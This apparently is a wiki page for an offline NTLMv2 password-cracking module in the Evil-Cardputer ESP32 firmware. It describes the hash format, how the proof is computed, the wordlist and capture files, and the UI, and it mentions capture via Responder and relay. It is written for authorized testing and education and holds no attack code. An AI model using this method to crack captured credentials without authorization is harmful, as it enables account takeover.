Skip to content

crackntlmv2

Jump to bottom
7h30th3r0n3 edited this page Jan 21, 2026 · 1 revision

🔐 Crack NTLMv2 (Offline)

Embedded NTLMv2 offline password cracking engine for Evil-Cardputer.
Optimized for low RAM, SD-based wordlists, and real-time UI feedback.

📖 Overview

This module implements an offline NTLMv2 password cracking engine directly on the ESP32 (M5Stack Cardputer).

It is designed to process NTLMv2 challenge-response hashes previously captured via legitimate security assessments (e.g. SMB relay, Responder, LLMNR poisoning).

The cracking process is entirely offline: no authentication attempts are sent to the target system.

🎯 Supported Hash Format

Each line in ntlm_hashes.txt must follow the standard NTLMv2 format: 

username::DOMAIN:SERVER_CHALLENGE:NT_PROOF:NTLMv2_BLOB

Example: 

alice::CORP:1122334455667788:9f1c...e42a:0101000000000000...

🧠 How NTLMv2 Works (Simplified)

  1. Password → UTF-16LE → MD4 → NT Hash
  2. NT Hash + (USERNAME + DOMAIN) → HMAC-MD5 → NTLMv2 Key
  3. NTLMv2 Key + (ServerChallenge || Blob) → HMAC-MD5
  4. Result compared to captured NT Proof

If the computed proof matches the captured one, the password is valid.

⚙️ Implementation Details

  • Custom MD4 implementation (NT hash)
  • Ultra-light MD5 optimized for ESP32
  • Optimized HMAC-MD5 (no heap churn)
  • Minimal dynamic allocations (low RAM footprint)
  • Wordlist streamed line-by-line from SD card

All cryptographic operations are performed locally on the device.

📂 Files & Storage

Path Purpose
/evil/NTLM/ntlm_hashes.txt Captured NTLMv2 hashes
/evil/NTLM/ntlm_wordlist.txt Password wordlist
/evil/NTLM/ntlm_found.txt Recovered credentials

If files do not exist, default structures are automatically created.

🖥️ User Interface

The cracking UI provides real-time feedback:

  • Current user being tested
  • Number of passwords tried
  • Progress bar (wordlist position)
  • Hashrate (H/s)
  • Immediate success / failure feedback

Controls:

  • ENTER: skip current user
  • BACKSPACE: abort cracking process

🧹 NTLMv2 Hash Cleaner

A dedicated cleanup utility is included to sanitize hash files:

  • Removes duplicate user::domain entries
  • Filters malformed or invalid lines
  • Uses 64-bit FNV-1a hashing (low RAM)
  • Live progress UI + cancel support

This is especially useful after large Responder or relay captures.

⚠️ Limitations

  • Wordlist-based (no brute-force masks)
  • ESP32 performance ≪ GPU / CPU rigs
  • Best suited for weak / reused passwords

This module is intended for:

  • Field validation
  • Quick wins during engagements
  • Educational demonstrations

❓ FAQ

Is this an online attack?

No. All cracking is done offline against previously captured hashes.

Does this replace hashcat?

No. This is not a replacement for GPU cracking tools. It complements them for portability and demonstrations.

Why run this on an ESP32?

To demonstrate that weak passwords remain weak — even on constrained hardware.

⚠️ Legal Warning

⚠️ WARNING

This module processes authentication material.

Use it only on systems you own or have explicit authorization to test.

Unauthorized use may violate local laws and company policies.

📚 References

  • MS-NLMP: NTLM Authentication Protocol
  • RFC 1320 — MD4 Message-Digest Algorithm
  • RFC 2104 — HMAC
  • Responder / WPAD capture techniques

NTLMv2 was designed to be stronger than NTLM — but passwords remain the weakest link.

Clone this wiki locally